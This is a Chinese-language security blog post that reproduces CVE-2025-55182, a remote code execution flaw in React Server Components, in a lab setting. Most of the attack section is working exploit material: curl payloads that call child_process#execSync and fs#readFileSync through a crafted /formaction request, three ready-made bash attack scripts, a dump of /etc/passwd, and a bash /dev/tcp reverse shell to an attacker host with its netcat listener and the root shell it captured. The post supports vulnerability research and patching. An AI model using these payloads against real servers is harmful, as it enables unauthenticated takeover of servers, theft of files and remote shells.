文章总结: CVE-2025-55182是ReactServerComponents中的远程代码执行漏洞,影响React19.0.0至19.2.0版本,CVSS评分10。攻击者可通过构造恶意HTTP请求实现完全服务器控制,无需身份验证。文章详细介绍了漏洞环境搭建、利用过程,包括执行命令、读取敏感文件和反弹shell的POC代码。建议受影响用户尽快升级React版本以修复此严重漏洞。 综合评分: 85 文章分类: 漏洞分析,漏洞POC,WEB安全,应用安全,漏洞预警
React 组件远程代码执行漏洞-CVE-2025-55182 Poc
zyliang
zyliang
2025年12月13日 15:08 北京
一、漏洞信息
- 漏洞编号:CVE-2025-55182
- 漏洞类型:反序列化漏洞导致RCE
- 危险等级:Critical,CVSS 评分10
- 漏洞简介: 该漏洞是React Server Components中的远程代码执行漏洞,攻击者可在无需身份验证的情况下,通过构造恶意HTTP请求实现完全服务器控制
- 影响范围: React版本 19.0.0、19.1.0、19.1.1、19.2.0
二、漏洞环境搭建
1、攻击机及靶机
1)攻击机地址: 10.182.218.116
2) 靶机地址: 10.182.218.202
靶机环境glibc版本不能太低,低于2.27无法安装node.js18。使用低版本的node.js会影响poc效果。
root@zyliang-master2:~# ldd --versionldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35Copyright (C) 2022 Free Software Foundation, Inc.This is free software; see the source for copying conditions. There is NOwarranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.Written by Roland McGrath and Ulrich Drepper.
2、安装node.js 18
# 1. 清理旧版本(可选)sudo apt remove --purge nodejs npm -ysudo apt autoremove -y
# 2. 添加 NodeSource 仓库(Node.js 18 LTS)curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 3. 安装 Node.js 18sudo apt-get install -y nodejs
# 4. 验证安装node --version # 应该显示 v18.x.xnpm --version
3、下载漏洞复现代码
git clone https://github.com/0xHyperia/CVE-2025-55182-poc.git
4、安装依赖
cd CVE-2025-55182-pocnpm install
5、依赖安装验证
[email protected] /root/CVE-2025-55182-poc└── [email protected]#如为空可通过如下尝试修复npm install [email protected]
6、漏洞环境验证
1) 环境启动
root@zyliang-master2:~/CVE-2025-55182-poc# npm start> [email protected] start> node --conditions react-server --conditions webpack src/server.jsLoading: /root/CVE-2025-55182-poc/node_modules/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.jsdecodeAction: functionServer at http://localhost:3002Manifest: [ 'fs', 'child_process', 'vm', 'util' ]POST /formactionFormData: $ACTION_REF_0: $ACTION_0:0: {"id":"vm#runInThisContext","bound":["1+1"]}[__webpack_require__] vm
2) 使用项目自带的代码验证,正常会返回success
root@zyliang-master2:~/CVE-2025-55182-poc# node exploit-rce-v4.js=== CVE-2025-55182 - RCE via vm.runInThisContext ===Test 1: Direct call to vm#runInThisContext with code1+1 = {"success":true,"result":"2"}Test 2: vm.runInThisContext with requireRCE attempt: {"success":true,"result":"uid=0(root) gid=0(root) groups=0(root)\n"}Test 3: Using global.processRCE attempt 2: {"success":true,"result":"uid=0(root) gid=0(root) groups=0(root)\n"}root@zyliang-master2:~/CVE-2025-55182-poc# curl -X POST http://localhost:3002/formaction \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}'{"success":true,"result":"root\n"}root@zyliang-master2:~/CVE-2025-55182-poc#
三、漏洞利用
1、执行whoami
1) payload执行脚本
[root@vulhub-2022-01 POC]# cat exploit-remote-whoami.sh#!/bin/bash
# CVE-2025-55182 - 远程whoami命令执行TARGET_URL="http://10.182.218.202:3002/formaction"
echo "=== CVE-2025-55182 远程RCE测试 - whoami ==="echo "🎯 目标地址: 10.182.218.202:3002"echo "📡 执行命令: whoami"
echo "🚀 发送Payload..."response=$(curl -s -X POST $TARGET_URL \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}')
echo ""echo "📊 服务器响应:"echo "$response"
# 结果if echo "$response" | grep -q '"success":true'; then result=$(echo "$response" | grep -o '"result":"[^"]*"' | cut -d'"' -f4) echo "" echo "✅ 漏洞利用成功!" echo "👤 当前用户: $result"else echo "" echo "❌ 命令执行失败" echo "💡 可能原因:" echo " - 服务器未响应" echo " - 漏洞已被修复" echo " - 网络连接问题"fi
echo ""echo "⏰ 测试时间: $(date)"
2) 结果
[root@vulhub-2022-01 POC]# ./exploit-remote-whoami.sh=== CVE-2025-55182 远程RCE测试 - whoami ===🎯 目标地址: 10.182.218.202:3002📡 执行命令: whoami🚀 发送Payload...
📊 服务器响应:{"success":true,"result":"root\n"}
✅ 漏洞利用成功!👤 当前用户: root\n
⏰ 测试时间: Fri Dec 12 15:34:43 CST 2025
2、查看敏感文件
1) payload执行脚本
[root@vulhub-2022-01 POC]# cat exploit-remote-passwd.sh#!/bin/bash# CVE-202555182 - 远程读取/etc/passwd文件TARGET_URL="http://10.182.218.202:3002/formaction"echo "=== CVE-2025-55182 远程文件读取测试 ==="echo "🎯 目标地址: 10.182.218.202:3002"echo "📁 读取文件: /etc/passwd"echo "🚀 发送文件读取Payload..."response=$(curl -s -X POST $TARGET_URL \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"fs#readFileSync","bound":["/etc/passwd","utf8"]}')echo ""echo "📊 服务器原始响应:"echo "$response"# 解析和显示结果if echo "$response" | grep -q '"success":'; then echo "" echo "✅ 文件读取成功!" echo "" echo "📋 /etc/passwd 内容摘要:" echo "========================" # 提取并格式化显示 result=$(echo "$response" | grep -o '"result":"[^"]*"' | cut -d'"' -f4 | sed 's/\\n/\n/g') echo "$result" # 保存完整结果 timestamp=$(date +%s) echo "$response" > /tmp/remote_passwd_result_${timestamp}.txt echo "" echo "💾 完整结果已保存到: /tmp/remote_passwd_result_${timestamp}.txt"else echo "" echo "❌ 文件读取失败" echo "💡 可能原因:" echo " 文件不存在或权限不足" echo " - 服务器响应格式错误" echo " - 漏洞已被修复"fiecho ""echo "⏰ 测试时间: $(date)"
2) 结果
[root@vulhub-2022-01 POC]# ./exploit-remote-passwd.sh=== CVE-2025-55182 远程文件读取测试 ===🎯 目标地址: 10.182.218.202:3002📁 读取文件: /etc/passwd🚀 发送文件读取Payload...
📊 服务器原始响应:{"success":true,"result":"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:102:105::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsyslog:x:104:111::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:115::/run/uuidd:/usr/sbin/nologin\nsystemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin\ntcpdump:x:109:117::/nonexistent:/usr/sbin/nologin\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin\nusbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\ndnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nkernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin\navahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nrtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin\nwhoopsie:x:117:124::/nonexistent:/bin/false\nsssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin\nspeech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false\nnm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin\nsaned:x:121:128::/var/lib/saned:/usr/sbin/nologin\ncolord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin\npulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin\ngnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false\nhplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false\ngdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false\nzyliang:x:1000:1000:zyliang,,,:/home/zyliang:/bin/bash\nsshd:x:128:65534::/run/sshd:/usr/sbin/nologin\nilo-ven:x:999:999:Illumio VEN User:/home/ilo-ven:/usr/sbin/nologin\nntp:x:129:136::/nonexistent:/usr/sbin/nologin\ntest:x:1000:1000:Test User:/home/test:/bin/bash\n"}
✅ 文件读取成功!
📋 /etc/passwd 内容摘要:========================root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologin
3、执行反弹shell
1) 攻击机监听端口
[root@vulhub-2022-01 ~]# nc -vnl 9999Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Listening on :::9999Ncat: Listening on 0.0.0.0:9999
2) payload执行脚本
[root@vulhub-2022-01 POC]# cat exploit-remote-reverse-shell.sh#!/bin/bash
# CVE-2025-55182 - 远程反弹shell攻击(bash方式)TARGET_URL="http://10.182.218.202:3002/formaction"ATTACKER_IP="10.182.218.116"ATTACKER_PORT="9999"
echo "=== CVE-2025-55182 远程反弹Shell攻击 ==="echo "🎯 目标服务器: 10.182.218.202:3002"echo "📡 反弹地址: $ATTACKER_IP:$ATTACKER_PORT"echo "🛠️ 使用方式: bash -i 反弹"echo ""
echo "📋 攻击准备检查:"echo " 目标漏洞服务器: 10.182.218.202:3002"echo " 监听攻击机: $ATTACKER_IP:$ATTACKER_PORT"echo ""
# 显示监听命令echo "👂 请在攻击机执行监听命令:"echo " nc -lvnp $ATTACKER_PORT"echo ""read "⚠️ 确认攻击机已启动监听,按回车键继续攻击..."
echo ""echo "🚀 发送bash反弹shell payload..."echo " 反弹命令: bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1"
# 发送bash反弹shell payloadresponse=$(curl -s -X POST $TARGET_URL \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"child_process#execSync","bound":["bash -c \"bash -i >& /dev/tcp/10.182.218.116/9999 0>&1\""]}')
echo ""echo "📊 服务器响应:"echo "$response"
# 等待连接建立echo ""echo "⏳ 等待连接建立 3
echo ""echo "🎯 攻击完成!"echo ""echo "🔍 结果检查:"echo " 请检查攻击机 $ATTACKER_IP:$ATTACKER_PORT 是否收到连接"echo ""echo "💡 提示:"echo " ✅ 如果成功: 您将在监听端看到目标服务器的shell提示符"echo " ❌ 如果失败,可能原因:"echo " - 目标服务器防火墙阻挡"echo " - 网络连通性问题"echo " - 目标bash不支持/dev/tcp"echo ""echo "⏰ 攻击时间: $(date)"
3) 结果
[root@vulhub-2022-01 POC]# ./exploit-remote-reverse-shell.sh=== CVE-2025-55182 远程反弹Shell攻击 ===🎯 目标服务器: 10.182.218.202:3002📡 反弹地址: 10.182.218.116:9999🛠️ 使用方式: bash -i 反弹
📋 攻击准备检查: 目标漏洞服务器: 10.182.218.202:3002 监听攻击机: 10.182.218.116:9999
👂 请在攻击机执行监听命令: nc -lvnp 9999
./exploit-remote-reverse-shell.sh: line 23: read: `⚠️ 确认攻击机已启动监听,按回车键继续攻击...': not a valid identifier
🚀 发送bash反弹shell payload... 反弹命令: bash -i >& /dev/tcp/10.182.218.116/9999 0>&1
4) 拿到shell
[root@vulhub-2022-01 ~]# nc -vnl 9999Ncat: Version 7.50 ( https://nmap.org/ncat )Ncat: Listening on :::9999Ncat: Listening on 0.0.0.0:9999Ncat: Connection from 10.182.218.202.Ncat: Connection from 10.182.218.202:45468.root@zyliang-master2:~/CVE-2025-55182-poc# ip aip aFailed to get current terminal: Inappropriate ioctl for devicetty: Inappropriate ioctl for device1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:50:56:9e:14:20 brd ff:ff:ff:ff:ff:ff altname enp11s0 inet 10.182.218.202/24 brd 10.182.218.255 scope global noprefixroute ens192 valid_lft forever preferred_lft forever inet6 fe80::255e:ad6:8d01:ca54/64 scope link noprefixroute valid_lft forever preferred_lft foreverroot@zyliang-master2:~/CVE-2025-55182-poc#
查看原文:《React 组件远程代码执行漏洞-CVE-2025-55182 Poc》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论